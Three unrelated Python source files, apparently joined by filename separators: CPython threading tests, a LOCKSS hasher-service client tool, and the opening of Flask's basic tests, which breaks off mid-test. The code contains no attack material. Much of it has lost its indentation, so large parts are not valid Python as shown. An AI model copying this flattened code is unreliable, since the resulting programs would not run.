@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
import test.test_threading as mod
while True:
with open(mod.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@support.requires_fork()
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
support.wait_process(pid, exitcode=50)
else:
os._exit(50)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@support.requires_fork()
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(51)
else:
os._exit(52)
else:
support.wait_process(pid, exitcode=51)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def pipe(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
if hasattr(os, 'set_blocking'):
os.set_blocking(r, False)
return (r, w)
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = f"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep({test.support.SHORT_TIMEOUT})
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@requires_subprocess()
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
def test_multithread_modify_file_noerror(self):
# See issue25872
def modify_file():
with open(os_helper.TESTFN, 'w', encoding='utf-8') as fp:
fp.write(' ')
traceback.format_stack()
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
threads = [
threading.Thread(target=modify_file)
for i in range(100)
]
for t in threads:
t.start()
t.join()
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def setUp(self):
restore_default_excepthook(self)
super().setUp()
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
def test_original_excepthook(self):
def run_thread():
with support.captured_output("stderr") as output:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
return output.getvalue()
def threading_hook(args):
print("Running a thread failed", file=sys.stderr)
default_output = run_thread()
with support.swap_attr(threading, 'excepthook', threading_hook):
custom_hook_output = run_thread()
threading.excepthook = threading.__excepthook__
recovered_output = run_thread()
self.assertEqual(default_output, recovered_output)
self.assertNotEqual(default_output, custom_hook_output)
self.assertEqual(custom_hook_output, "Running a thread failed\n")
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
        # Issue 17435: constructor defaults were mutable objects; they could be
        # mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
restore_default_excepthook(self)
extra = {"ThreadError"}
not_exported = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, not_exported=not_exported)
class InterruptMainTests(unittest.TestCase):
def check_interrupt_main_with_signal_handler(self, signum):
def handler(signum, frame):
1/0
old_handler = signal.signal(signum, handler)
self.addCleanup(signal.signal, signum, old_handler)
with self.assertRaises(ZeroDivisionError):
_thread.interrupt_main()
def check_interrupt_main_noerror(self, signum):
handler = signal.getsignal(signum)
try:
# No exception should arise.
signal.signal(signum, signal.SIG_IGN)
_thread.interrupt_main(signum)
signal.signal(signum, signal.SIG_DFL)
_thread.interrupt_main(signum)
finally:
# Restore original handler
signal.signal(signum, handler)
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
        # Make sure that if interrupt_main is called in the main thread,
        # KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_with_signal_handler(self):
self.check_interrupt_main_with_signal_handler(signal.SIGINT)
self.check_interrupt_main_with_signal_handler(signal.SIGTERM)
def test_interrupt_main_noerror(self):
self.check_interrupt_main_noerror(signal.SIGINT)
self.check_interrupt_main_noerror(signal.SIGTERM)
def test_interrupt_main_invalid_signal(self):
self.assertRaises(ValueError, _thread.interrupt_main, -1)
self.assertRaises(ValueError, _thread.interrupt_main, signal.NSIG)
self.assertRaises(ValueError, _thread.interrupt_main, 1000000)
@threading_helper.reap_threads
def test_can_interrupt_tight_loops(self):
cont = [True]
started = [False]
interrupted = [False]
def worker(started, cont, interrupted):
iterations = 100_000_000
started[0] = True
while cont[0]:
if iterations:
iterations -= 1
else:
return
interrupted[0] = True
t = threading.Thread(target=worker,args=(started, cont, interrupted))
t.start()
while not started[0]:
pass
cont[0] = False
t.join()
self.assertTrue(interrupted[0])
class AtexitTests(unittest.TestCase):
def test_atexit_output(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
def run_last():
print('parrot')
threading._register_atexit(run_last)
""")
self.assertFalse(err)
self.assertEqual(out.strip(), b'parrot')
def test_atexit_called_once(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
from unittest.mock import Mock
mock = Mock()
threading._register_atexit(mock)
mock.assert_not_called()
# force early shutdown to ensure it was called once
threading._shutdown()
mock.assert_called_once()
""")
self.assertFalse(err)
def test_atexit_after_shutdown(self):
# The only way to do this is by registering an atexit within
# an atexit, which is intended to raise an exception.
rc, out, err = assert_python_ok("-c", """if True:
import threading
def func():
pass
def run_last():
threading._register_atexit(func)
threading._register_atexit(run_last)
""")
self.assertTrue(err)
self.assertIn("RuntimeError: can't register atexit after shutdown",
err.decode())
if __name__ == "__main__":
unittest.main()
|
hasherservice.py
|
#!/usr/bin/env python
'''A library and a command line tool to interact with the LOCKSS daemon hasher
service via its Web Services API.'''
# $Id$
__copyright__ = '''\
Copyright (c) 2000-2016 Board of Trustees of Leland Stanford Jr. University,
all rights reserved.
'''
__license__ = '''\
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
STANFORD UNIVERSITY BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Except as contained in this notice, the name of Stanford University shall not
be used in advertising or otherwise to promote the sale, use or other dealings
in this Software without prior written authorization from Stanford University.
'''
__version__ = '0.4.1'
import getpass
from multiprocessing.dummy import Pool as ThreadPool
import optparse
import os.path
import sys
import time
from threading import Thread
import HasherServiceImplService_client
from wsutil import zsiauth
def hash_au(host, auth, auid):
'''Returns the full hash of the given AU
'''
req = HasherServiceImplService_client.hash()
req.HasherParams = req.new_hasherParams()
req.HasherParams.AuId = auid
return _ws_port(host, auth).hash(req).Return
def hash_au_url(host, auth, auid, url):
    '''Returns the filtered file of the given URL and AU
    '''
    req = HasherServiceImplService_client.hash()
    req.HasherParams = req.new_hasherParams()
    req.HasherParams.AuId = auid
    req.HasherParams.Url = url
    req.HasherParams.HashType = "V3File"
    req.HasherParams.RecordFilteredStream = True
    return _ws_port(host, auth, sys.stdout).hash(req).Return
def hash_asynchronously_au(host, auth, auid):
    '''Returns a request id for an asynchronous hash of the given AU
    '''
    req = HasherServiceImplService_client.hashAsynchronously()
    req.HasherParams = req.new_hasherParams()
    req.HasherParams.AuId = auid
    try: return _ws_port(host, auth).hashAsynchronously(req).Return.RequestId
    except AttributeError: return None
def hash_asynchronously_au_url(host, auth, auid, url):
    '''Returns a request id for an asynchronous hash of the given URL
    '''
    req = HasherServiceImplService_client.hashAsynchronously()
    req.HasherParams = req.new_hasherParams()
    req.HasherParams.AuId = auid
    req.HasherParams.Url = url
    req.HasherParams.HashType = "V3File"
    req.HasherParams.RecordFilteredStream = True
    try: return _ws_port(host, auth).hashAsynchronously(req).Return.RequestId
    except AttributeError: return None
def get_asynchronous_hash_result(host, auth, request_id):
'''Returns a hash result for the hash associated with given request_id
'''
req = HasherServiceImplService_client.getAsynchronousHashResult()
req.RequestId = request_id
return _ws_port(host, auth).getAsynchronousHashResult(req).Return
def remove_asynchronous_hash_request(host, auth, request_id):
'''Removes the hash associated with given request_id
'''
req = HasherServiceImplService_client.removeAsynchronousHashRequest()
req.RequestId = request_id
return _ws_port(host, auth).removeAsynchronousHashRequest(req).Return
def _ws_port(host, auth, tracefile=None):
url = 'http://%s/ws/HasherService' % (host,)
locator = HasherServiceImplService_client.HasherServiceImplServiceLocator()
if tracefile is None: return locator.getHasherServiceImplPort(url=url, auth=auth)
else: return locator.getHasherServiceImplPort(url=url, auth=auth, tracefile=tracefile)
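# Illustrative usage sketch of the library functions above. The host, AUID
# and credentials are hypothetical placeholders; the polling loop mirrors
# what _do_hash() below does with the result's _status field.
def _example_library_usage():
    auth = zsiauth('ui-user', 'ui-pass')        # hypothetical credentials
    host = 'lockss.example.edu:8081'            # hypothetical host:port
    auid = 'org|lockss|plugin|ExamplePlugin'    # hypothetical AUID
    full_hash = hash_au(host, auth, auid)       # synchronous whole-AU hash
    # Asynchronous variant: start the hash, poll until done, then clean up.
    reqid = hash_asynchronously_au(host, auth, auid)
    if reqid is not None:
        while get_asynchronous_hash_result(host, auth, reqid)._status != 'Done':
            time.sleep(10)
        remove_asynchronous_hash_request(host, auth, reqid)
    return full_hash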
#
# Command line tool
#
class _HasherServiceOptions(object):
@staticmethod
def make_parser():
usage = '%prog [--host=HOST|--hosts=HFILE]... --auid=AUID [--url=URL] [--output-directory=OUTDIR] --output-prefix=PREFIX [OPTIONS]'
parser = optparse.OptionParser(version=__version__, description=__doc__, usage=usage)
# Hosts
group = optparse.OptionGroup(parser, 'Hosts')
group.add_option('--host', action='append', default=list(), help='add host:port pair to list of target hosts')
group.add_option('--hosts', action='append', default=list(), metavar='HFILE', help='add host:port pairs in HFILE to list of target hosts')
group.add_option('--password', metavar='PASS', help='UI password (default: interactive prompt)')
group.add_option('--username', metavar='USER', help='UI username (default: interactive prompt)')
parser.add_option_group(group)
# AUID and URL
group = optparse.OptionGroup(parser, 'AUID and URL')
group.add_option('--auid', help='target AUID')
group.add_option('--url', help='target URL (optional)')
parser.add_option_group(group)
# Output
group = optparse.OptionGroup(parser, 'Output')
group.add_option('--output-directory', metavar='OUTDIR', default='.', help='output directory (default: current directory)')
group.add_option('--output-prefix', metavar='PREFIX', default='hasherservice', help='prefix for output file names (default: "hasherservice")')
parser.add_option_group(group)
# Other options
group = optparse.OptionGroup(parser, 'Other options')
group.add_option('--long-html-line', action='store_true', help='add a newline before each "<" character')
group.add_option('--long-text-line', action='store_true', help='replace each space with a newline')
group.add_option('--threads', type='int', help='maximum number of parallel jobs allowed (default: no limit)')
group.add_option('--wait', type='int', help='seconds to wait between asynchronous checks (default: 10 with --url, 30 without)')
parser.add_option_group(group)
return parser
def __init__(self, parser, opts, args):
super(_HasherServiceOptions, self).__init__()
if len(args) != 0: parser.error('extraneous arguments: %s' % (' '.join(args)))
# hosts
self.hosts = opts.host[:]
for f in opts.hosts: self.hosts.extend(_file_lines(f))
if len(self.hosts) == 0: parser.error('at least one target host is required')
# auid/url
self.auid = opts.auid
self.url = opts.url
# output_directory/output_prefix
self.output_directory = os.path.expanduser(opts.output_directory)
if not os.path.isdir(self.output_directory):
parser.error('no such directory: %s' % (self.output_directory,))
if opts.output_prefix is None: parser.error('--output-prefix is required')
if '/' in opts.output_prefix: parser.error('output prefix cannot contain a slash')
self.output_prefix = opts.output_prefix
# long_html_line/long_text_line/wait/threads
if any([opts.long_html_line, opts.long_text_line]) and self.url is None:
parser.error('--long-html-line, --long-text-line only apply to --url')
if opts.long_html_line and opts.long_text_line:
parser.error('--long-html-line, --long-text-line are incompatible')
self.long_html_line = opts.long_html_line
self.long_text_line = opts.long_text_line
if opts.wait is None: self.wait = 30 if self.url is None else 10
else: self.wait = opts.wait
# threads
self.threads = opts.threads or len(self.hosts)
# auth
u = opts.username or getpass.getpass('UI username: ')
p = opts.password or getpass.getpass('UI password: ')
self.auth = zsiauth(u, p)
def _do_hash(options, host):
if options.url is None: reqid = hash_asynchronously_au(host, options.auth, options.auid)
else: reqid = hash_asynchronously_au_url(host, options.auth, options.auid, options.url)
if reqid is None: return host, False
while True:
time.sleep(options.wait)
res = get_asynchronous_hash_result(host, options.auth, reqid)
if res._status == 'Done': break
if options.url is None:
source = res._blockFileDataHandler
fstr = '%s.%s.hash' % (options.output_prefix, host)
else:
source = res._recordFileDataHandler
fstr = '%s.%s.filtered' % (options.output_prefix, host)
if source is not None:
lines = [line for line in source]
if options.long_html_line: lines = map(lambda s: s.replace('<', '\n<'), lines)
if options.long_text_line: lines = map(lambda s: s.replace(' ', '\n'), lines)
with open(os.path.join(options.output_directory, fstr), 'w') as f:
f.writelines(lines)
res = remove_asynchronous_hash_request(host, options.auth, reqid)
return host, source is not None
def _do_hashes(options):
for host, result in ThreadPool(options.threads).imap_unordered( \
lambda _host: _do_hash(options, _host), \
options.hosts):
if result is False:
sys.stderr.write('Warning: not found on %s\n' % (host,))
# Last modified 2015-08-31
def _file_lines(fstr):
    with open(os.path.expanduser(fstr)) as f:
        # Strip comments and blank lines; build a list so len() also works
        # under Python 3, where filter() returns an iterator.
        ret = [line for line in (x.partition('#')[0].strip() for x in f) if len(line) > 0]
    if len(ret) == 0: sys.exit('Error: %s contains no meaningful lines' % (fstr,))
    return ret
def _main():
'''Main method.'''
parser = _HasherServiceOptions.make_parser()
(opts, args) = parser.parse_args()
options = _HasherServiceOptions(parser, opts, args)
t = Thread(target=_do_hashes, args=(options,))
t.daemon = True
t.start()
while True:
t.join(1.5)
if not t.is_alive(): break
# Main entry point
if __name__ == '__main__': _main()
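# Example invocation (hypothetical host and AUID, for illustration only):
#   hasherservice.py --host=lockss.example.edu:8081 \
#       --auid='org|lockss|plugin|ExamplePlugin' \
#       --output-prefix=myhash --threads=4
# This hashes the AU on each target host and writes one
# <PREFIX>.<host>.hash file per host into the output directory.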
|
test_basic.py
|
# -*- coding: utf-8 -*-
"""
tests.basic
~~~~~~~~~~~~~~~~~~~~~
The basic functionality.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import pytest
import re
import uuid
import time
import flask
import pickle
from datetime import datetime
from threading import Thread
from flask._compat import text_type
from werkzeug.exceptions import BadRequest, NotFound, Forbidden
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
import werkzeug.serving
def test_options_work():
app = flask.Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
return 'Hello World'
rv = app.test_client().open('/', method='OPTIONS')
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS', 'POST']
assert rv.data == b''
def test_options_on_multiple_rules():
app = flask.Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
return 'Hello World'
@app.route('/', methods=['PUT'])
def index_put():
return 'Aha!'
rv = app.test_client().open('/', method='OPTIONS')
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS', 'POST', 'PUT']
def test_options_handling_disabled():
app = flask.Flask(__name__)
def index():
return 'Hello World!'
index.provide_automatic_options = False
app.route('/')(index)
rv = app.test_client().open('/', method='OPTIONS')
assert rv.status_code == 405
app = flask.Flask(__name__)
def index2():
return 'Hello World!'
index2.provide_automatic_options = True
app.route('/', methods=['OPTIONS'])(index2)
rv = app.test_client().open('/', method='OPTIONS')
assert sorted(rv.allow) == ['OPTIONS']
def test_request_dispatching():
app = flask.Flask(__name__)
@app.route('/')
def index():
return flask.request.method
@app.route('/more', methods=['GET', 'POST'])
def more():
return flask.request.method
c = app.test_client()
assert c.get('/').data == b'GET'
rv = c.post('/')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS']
rv = c.head('/')
assert rv.status_code == 200
assert not rv.data # head truncates
assert c.post('/more').data == b'POST'
assert c.get('/more').data == b'GET'
rv = c.delete('/more')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS', 'POST']
def test_disallow_string_for_allowed_methods():
app = flask.Flask(__name__)
with pytest.raises(TypeError):
@app.route('/', methods='GET POST')
def index():
return "Hey"
def test_url_mapping():
app = flask.Flask(__name__)
random_uuid4 = "7eb41166-9ebf-4d26-b771-ea3f54f8b383"
def index():
return flask.request.method
def more():
return flask.request.method
def options():
return random_uuid4
app.add_url_rule('/', 'index', index)
app.add_url_rule('/more', 'more', more, methods=['GET', 'POST'])
    # Issue 1288: test that automatic OPTIONS handling is not added when a
    # non-uppercase 'options' appears in methods
app.add_url_rule('/options', 'options', options, methods=['options'])
c = app.test_client()
assert c.get('/').data == b'GET'
rv = c.post('/')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS']
rv = c.head('/')
assert rv.status_code == 200
assert not rv.data # head truncates
assert c.post('/more').data == b'POST'
assert c.get('/more').data == b'GET'
rv = c.delete('/more')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS', 'POST']
rv = c.open('/options', method='OPTIONS')
assert rv.status_code == 200
assert random_uuid4 in rv.data.decode("utf-8")
def test_werkzeug_routing():
from werkzeug.routing import Submount, Rule
app = flask.Flask(__name__)
app.url_map.add(Submount('/foo', [
Rule('/bar', endpoint='bar'),
Rule('/', endpoint='index')
]))
def bar():
return 'bar'
def index():
return 'index'
app.view_functions['bar'] = bar
app.view_functions['index'] = index
c = app.test_client()
assert c.get('/foo/').data == b'index'
assert c.get('/foo/bar').data == b'bar'
def test_endpoint_decorator():
from werkzeug.routing import Submount, Rule
app = flask.Flask(__name__)
app.url_map.add(Submount('/foo', [
Rule('/bar', endpoint='bar'),
Rule('/', endpoint='index')
]))
@app.endpoint('bar')
def bar():
return 'bar'
@app.endpoint('index')
def index():
return 'index'
c = app.test_client()
assert c.get('/foo/').data == b'index'
assert c.get('/foo/bar').data == b'bar'
def test_session():
app = flask.Flask(__name__)
app.secret_key = 'testkey'
@app.route('/set', methods=['POST'])
def set():
flask.session['value'] = flask.request.form['value']
return 'value set'
@app.route('/get')
def get():
return flask.session['value']
c = app.test_client()
assert c.post('/set', data={'value': '42'}).data == b'value set'
assert c.get('/get').data == b'42'
def test_session_using_server_name():
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='example.com'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com/')
assert 'domain=.example.com' in rv.headers['set-cookie'].lower()
assert 'httponly' in rv.headers['set-cookie'].lower()
def test_session_using_server_name_and_port():
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='example.com:8080'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com:8080/')
assert 'domain=.example.com' in rv.headers['set-cookie'].lower()
assert 'httponly' in rv.headers['set-cookie'].lower()
def test_session_using_server_name_port_and_path():
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='example.com:8080',
APPLICATION_ROOT='/foo'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com:8080/foo')
assert 'domain=example.com' in rv.headers['set-cookie'].lower()
assert 'path=/foo' in rv.headers['set-cookie'].lower()
assert 'httponly' in rv.headers['set-cookie'].lower()
def test_session_using_application_root():
class PrefixPathMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ['SCRIPT_NAME'] = self.prefix
return self.app(environ, start_response)
app = flask.Flask(__name__)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, '/bar')
app.config.update(
SECRET_KEY='foo',
APPLICATION_ROOT='/bar'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com:8080/')
assert 'path=/bar' in rv.headers['set-cookie'].lower()
def test_session_using_session_settings():
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='www.example.com:8080',
APPLICATION_ROOT='/test',
SESSION_COOKIE_DOMAIN='.example.com',
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_PATH='/'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://www.example.com:8080/test/')
